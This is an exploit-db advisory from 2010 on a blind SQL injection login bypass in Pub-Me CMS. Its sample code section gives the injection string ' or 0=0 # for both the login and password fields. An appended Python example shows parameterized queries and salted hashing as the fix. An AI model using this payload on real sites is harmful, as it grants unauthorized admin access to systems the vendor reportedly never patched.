Pub-Me CMS – Blind SQL Injection

  • Author: H4f
    Date: 2010-10-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15348/
  • Pub-Me CMS Blind SQL Injection Vulnerability
     
     Name: Pub-Me CMS
     Vendor: http://www.pub-me.com/
     Versions Affected: //unknown, all current affected - devel. homepage & 33 clients web pages
     Software Link: Not available, Demo can be requested by e-mail from vendor
     Found by: H4f, <Sec was born project, Anonymous submission>
     Contact: zotrob [at] gmail [dot] com
     Date: 2010-10-25
     
    X. INDEX
     
     I. ABOUT THE APPLICATION
     II. DESCRIPTION
     III. ANALYSIS
     IV. SAMPLE CODE
     V. FIX
    
     
    I. ABOUT THE APPLICATION
    ________________________
     
    Pub-Me Content Management System is designed to make it possible for you to pay full 
    attention to the content without having to bother about technologies.
    
    II. DESCRIPTION
    _______________
     
    Input from the login form is NOT properly sanitised before being used
    in a SQL query.
     
     
    III. ANALYSIS
    _____________
     
    Summary:
     
    All Pub-Me based websites are vulnerable; any more or less trained monkey can reach the admin panel. 
    ______________________
    
     
    IV. SAMPLE CODE
    _______________
     
    Blind SQL Injection
     
     Login> ' or 0=0 #
     Pass>' or 0=0 #
     
    V. FIX
    ______
     
    Vendor contacted, no response.
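
Added example, not part of the original advisory and not the vendor's code: a login check that binds the form fields as query parameters, so the strings from section IV are compared as data instead of changing the query. The schema, the account, the function names and the use of sqlite3 and PBKDF2 are assumptions made for illustration; the advisory does not show how Pub-Me builds its query.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_pw(password, salt):
    # Salted, slow hash so the table never holds plaintext passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    # Constructed schema and account; the real Pub-Me schema is not public.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
               "login TEXT UNIQUE, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users (login, salt, pw_hash) VALUES (?, ?, ?)",
               ("admin", salt, hash_pw("correct horse", salt)))
    return db

def concatenated_query(login, password):
    # Assumed unsafe pattern: form input is pasted into the SQL text.
    # Shown only as a string; it is never executed here.
    return ("SELECT id FROM users WHERE login = '" + login +
            "' AND pass = '" + password + "'")

def check_login(db, login, password):
    # Hardened form: '?' placeholders keep input out of the SQL grammar.
    row = db.execute("SELECT id, salt, pw_hash FROM users WHERE login = ?",
                     (login,)).fetchone()
    if row is None:
        return None
    user_id, salt, stored = row
    # Constant-time comparison of the derived hash with the stored one.
    ok = hmac.compare_digest(hash_pw(password, salt), stored)
    return user_id if ok else None

if __name__ == "__main__":
    form_value = "' or 0=0 #"          # the input from section IV
    # With concatenation the quote closes the literal and, in MySQL,
    # '#' comments out the rest of the statement, password test included.
    print(concatenated_query(form_value, form_value))
    db = make_db()
    print(check_login(db, form_value, form_value))    # no such login
    print(check_login(db, "admin", "correct horse"))  # valid account
```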